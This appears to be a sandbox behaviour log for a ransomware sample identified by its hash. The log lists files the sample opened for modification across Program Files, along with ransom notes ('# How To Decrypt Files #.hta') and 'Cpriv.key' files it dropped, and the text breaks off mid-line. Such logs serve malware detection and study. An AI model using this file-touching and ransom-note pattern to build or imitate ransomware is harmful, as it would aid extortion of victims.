de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02371_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.natives_1.1.100.v20140523-0116.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.nl_zh_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107026.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341344.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382965.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00737_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\DESIGNER\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\Stationery\Pine_Lumber.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolIcons\MAIL.ICO de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Internet Explorer\ie9props.propdesc de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR35F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\Discussion\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\cmm\sRGB.pf de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\WINWORD.DEV_F_COL.HXK de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\Certificates\groove.net\Servers\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_search_down_BIDI.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\THEMES14\RIPPLE\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\Notes_btn-back-static.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\3082\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187847.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0196400.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\OutlookAutoDiscover\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\shuffle_over.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\Stationery\Hand Prints.htm de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\about.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0289430.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0235241.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\7-Zip\Lang\hu.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\Smart Tag\LISTS\1033\STOCKS.DAT de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD02071_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Document Parts\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\OutlookAutoDiscover\NL.ROGERS.COM.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\vi\LC_MESSAGES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\RMNSQUE\THMBNAIL.PNG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.ui.ja_5.5.0.165303.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\GreenTea.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\1047x576black.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO01785_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\item_hover_floating.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_close_over.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PARNT_03.MID de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\DataListIconImagesMask.bmp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02736G.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\BG_ADOBE.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\reflect.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\button-bullet.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF\eclipse.inf de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jre7\bin\plugin2\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Colors\Concourse.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\MSPUB_COL.HXT de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGLBL078.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\IRIS\IRIS.INF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD15035_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\en-US\css\clock.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\THEMES14\EVRGREEN\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\SpeechEngines\Microsoft\TTS20\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\BANNER.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\hrtfs\dodeca_and_7channel_3DSL_HRTF.sofa de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\System\Ole DB\oledbvbs.inc de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\lv-LV\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\GoldRing.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\sql90.xsl de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\en-US\css\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR9F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\plugins\packetizer\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15132_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\images\calendar_double_bkg.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\SKY\PREVIEW.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.updatechecker.nl_ja_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\1047x576black.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\day-of-week-16.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\en-US\js\currency.js de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher.eclipse.nl_zh_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\skins\fonts\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00130_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099157.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0292020.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\ONENOTE\14\Stationery\PLANNERS.ONE de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\org.eclipse.equinox.simpleconfigurator de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\TRANSLAT\ARFR\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\TitleButtonIcon.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0292270.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\XML Files\Space Templates\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\trad_s.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\en-US\css\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\ipsjpn.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\MSInfo\en-US\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00455_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HM00116_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR28F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\Sounds\Places\TOOT.WAV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows NT\Accessories\en-US\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\Stationery\Seyes.emf de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105506.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0241781.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\BabyBlue\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\rtf_italic.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\en_GB\LC_MESSAGES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Windows NT\TableTextService\TableTextServiceSimplifiedZhengMa.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\Triedit\en-US\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0101980.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jre7\lib\management-agent.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099205.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0241773.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR7B.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\Certificates\Verisign\Components\VeriSign_Class_3_Code_Signing_2001-4_CA.cer de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveDocumentReview\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.resources_3.9.1.v20140825-1431.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.server_8.1.14.v20131031.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21503_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\InfoPathOM\InfoPathOMFormServices\InfoPathOMFormServicesV12\Microsoft.Office.InfoPath.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\lua\http\js\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00223_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18250_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14514_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\QuickStyles\Elegant.dotx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\ONENOTE\14\Stationery\BUSINESS.ONE de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\gd\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\graph_up.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Full\NavigationUp_SelectionSubpicture.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0106816.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\OutlineToolIconImages.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGMN081.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\en-US\js\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\jfr\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\WHIRL2.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-coredump.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD01659_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21423_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\en-US\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\System\ado\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.model.workbench.nl_zh_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01629_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01164_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME25.CSS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\LISTBOX.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Journal\en-US\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\Stationery\Garden.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\soniccolorconverter.ax de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099185.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\plugins\d3d11\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\db\lib\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH01875_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\setNetworkClientCP.bat de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00154_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\Gadget_Main_Gradient.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Effects\Paper.eftx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\SpringGreen.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Colors\Origin.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files 